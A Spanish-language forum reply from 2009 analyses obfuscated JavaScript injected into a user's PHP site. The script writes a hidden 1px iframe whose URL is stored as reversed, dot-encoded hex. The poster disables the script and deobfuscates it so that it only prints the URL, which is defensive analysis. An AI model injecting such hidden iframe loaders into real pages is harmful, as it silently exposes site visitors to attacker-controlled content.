Tema: eliminar javascript en mi codigo PHP
Ver Mensaje Individual
  #8 (permalink)  
Antiguo 14/09/2009, 18:16
Avatar de pato12
pato12
 
Fecha de Ingreso: septiembre-2007
Ubicación: Salta
Mensajes: 1.620
Antigüedad: 16 años, 6 meses
Puntos: 101
Respuesta: eliminar javascript en mi codigo PHP
Cita:
Iniciado por koder5 Ver Mensaje
Hola, creo saber de dónde está viniendo el problema, vos tenés tu dominio manejado por algún proveedor de free DNS? porque si es así a casi todos los usuarios les inyecta javascript con alguna especie de propaganda o algún robot de alguna especie. Tendrías que verificar esto, porque para mí viene del proveedor de hosting o de free DNS. Saludos.
Hola,
No creo... para que inyectar un iframe oculto. Y creo que es un codigo malisioso, porque firefox no te deja entrar a la pagina del iframe.
El codigo es:
Código javascript: 
Ver original
  1. <script>
  2. // NO EJECUTAR CODIGO, ESTA DESACTIVADO, PERO SI DESCOMENTAN LA ULTIMA LINEA YA NO
  3. var YtJzBU=document;
  4. function UvrUmwYA(fXCunYmB){
  5.     var DdKQrsBtb = "",MAueQJPqK=0;
  6.     for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--){
  7.         DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);
  8.     }
  9.     return DdKQrsBtb;
  10. }
  11. function lAzxGtC(XFRZIMF_){
  12.     XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");
  13.     XFRZIMF_=unescape(XFRZIMF_);
  14.     return UvrUmwYA(XFRZIMF_);
  15. }
  16. function gqDmBRQ(){
  17.     YtJzBU.write("<style>.JIjzCtPmog{width:1px;height: 1px;border:none;visibility:hidden}</style>");
  18.     var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";
  19.     var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f .6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6 c.2e.77.77.77.2f.2f.3a.70.74.74.68"));
  20.     return eukscm;
  21. }
  22. //YtJzBU.writeln(gqDmBRQ());
  23. </script>
Y este es el mismo codigo, pero que se entienda mejor:
Código javascript: 
Ver original
  1. <script>
  2. var documento=document;
  3. function desencriptarRe(url){
  4.     var final = "",numerok=0;
  5.     for(numerok=url.length-1;numerok >= 0;numerok--){
  6.         final+=url.charAt(numerok);
  7.     }
  8.     return final;
  9. }
  10. function desencriptar(codigo){
  11.     codigo=codigo.replace(/[\.]/g, "%");
  12.     codigo=unescape(codigo);
  13.     return desencriptarRe(codigo);
  14. }
  15. function getIfram(){
  16. //  documento.write("<style>.JIjzCtPmog{width:1px;height: 1px;border:none;visibility:hidden}</style>");
  17. //  var html="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";
  18.     var html="x";
  19.     var html_final=html.replace(/[\+x]/g,desencriptar(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f .6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6 c.2e.77.77.77.2f.2f.3a.70.74.74.68"));
  20.     return html_final;
  21. }
  22. documento.writeln(getIfram());
  23. </script>
Este ultimo si es seguro ejecutar, lo que va a hacer es imprimir la url del iframe. Pero como esta mal el codigo, la url esta mal ;) si el codigo que posteaste es el mismo, no te preocupes porque el que lo inyecto lo puso mal.
Suerte
Salu2
__________________
Half Music - www.halfmusic.com